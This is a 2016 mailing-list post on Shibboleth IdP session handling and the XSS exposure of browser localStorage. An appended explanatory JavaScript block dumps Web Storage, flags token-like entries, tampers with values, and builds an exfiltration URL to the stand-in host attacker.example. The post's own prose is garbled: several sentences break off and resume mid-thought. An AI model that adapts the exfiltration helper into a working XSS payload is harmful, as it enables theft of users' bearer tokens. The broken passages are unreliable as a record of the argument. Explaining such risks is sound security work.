idp.session.consistentAddress and real security implications.
putmanb at georgetown.edu
Mon Apr 25 15:25:30 EDT 2016
On 4/25/16 2:15 PM, Cantor, Scott wrote:
> If Local Storage is equally vulnerable to theft, which is likely, then having that data on the client doesn't affect this risk much.
I was looking into this recently for other reasons. My understanding so
far is that localStorage/sessionStorage is accessible from any
That means it's completely vulnerable via XSS attacks for theft,
tampering, etc, if the attacker manages to get the browser to load and
local storage not be used for the storage of any security-sensitive
info, such as OAuth security tokens or any other kind of bearer token, and
of course not passwords, secrets, etc.
I was actually going to bring up soon what and how the IdP is actually
doing with local storage and the client-side storage service impl, just
so I understand better the tradeoffs in general.
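To make the point above concrete, here is an added example (not code from the thread, the Shibboleth IdP, or its client-storage service) of what any script executing in a page's origin can do to Web Storage. The Storage interface (length, key(i), getItem, setItem, removeItem, clear) is the real browser API; the MemoryStorage class is a constructed stand-in implementing that interface so the block runs under Node, and the collector URL and sample entries are assumptions.

```javascript
// Added example: why localStorage/sessionStorage are not a safe home for
// bearer tokens. Every entry is readable and writable by any same-origin
// script, including an injected XSS payload; there is no equivalent of the
// HttpOnly cookie flag for Web Storage.

// Constructed stand-in for window.localStorage (same Storage interface) so
// the example runs offline under Node. In a browser, pass window.localStorage.
class MemoryStorage {
  constructor(entries = {}) { this._m = new Map(Object.entries(entries)); }
  get length() { return this._m.size; }
  key(i) { const ks = [...this._m.keys()]; return i < ks.length ? ks[i] : null; }
  getItem(k) { return this._m.has(k) ? this._m.get(k) : null; }
  setItem(k, v) { this._m.set(String(k), String(v)); }
  removeItem(k) { this._m.delete(k); }
  clear() { this._m.clear(); }
}

// Walk every entry the way an injected payload would: the Storage API lets a
// same-origin script enumerate all keys without knowing their names.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

// Heuristics an auditor (or an attacker) would use to pick out bearer
// credentials: JWT-shaped values and key names that suggest secrets.
const JWT_RE = /^[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]*$/;
const SENSITIVE_KEY_RE = /(token|secret|password|credential|session)/i;

function findBearerLike(storage) {
  const hits = [];
  for (const [k, v] of Object.entries(dumpStorage(storage))) {
    if (JWT_RE.test(v) || SENSITIVE_KEY_RE.test(k)) hits.push(k);
  }
  return hits.sort();
}

// Theft: the dump becomes a query string on a URL the payload would load via
// an Image or fetch(). The collector host is an assumption; nothing is sent.
function exfilUrl(storage, collector = "https://attacker.example/c") {
  const body = JSON.stringify(dumpStorage(storage));
  return `${collector}?d=${encodeURIComponent(body)}`;
}

// Tampering is just as easy: overwrite whatever the application trusts.
function tamper(storage, key, value) {
  storage.setItem(key, value);
  return storage.getItem(key);
}

// Constructed sample resembling what a browser app might leave behind.
const sample = new MemoryStorage({
  "theme": "dark",
  "access_token": "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.c2lnbmF0dXJl",
  "idp_client_storage": "opaque-client-storage-blob",
});

// Stand-alone demo when run directly with Node.
if (typeof require !== "undefined" && require.main === module) {
  console.log(findBearerLike(sample));
  console.log(exfilUrl(sample));
}
```

The contrast worth keeping in mind: a session cookie set with HttpOnly is not exposed through document.cookie at all, so the same XSS payload can ride along with it but cannot copy it out. Anything placed in Web Storage can be both copied and rewritten, which is what the "theft, tampering" remark above boils down to.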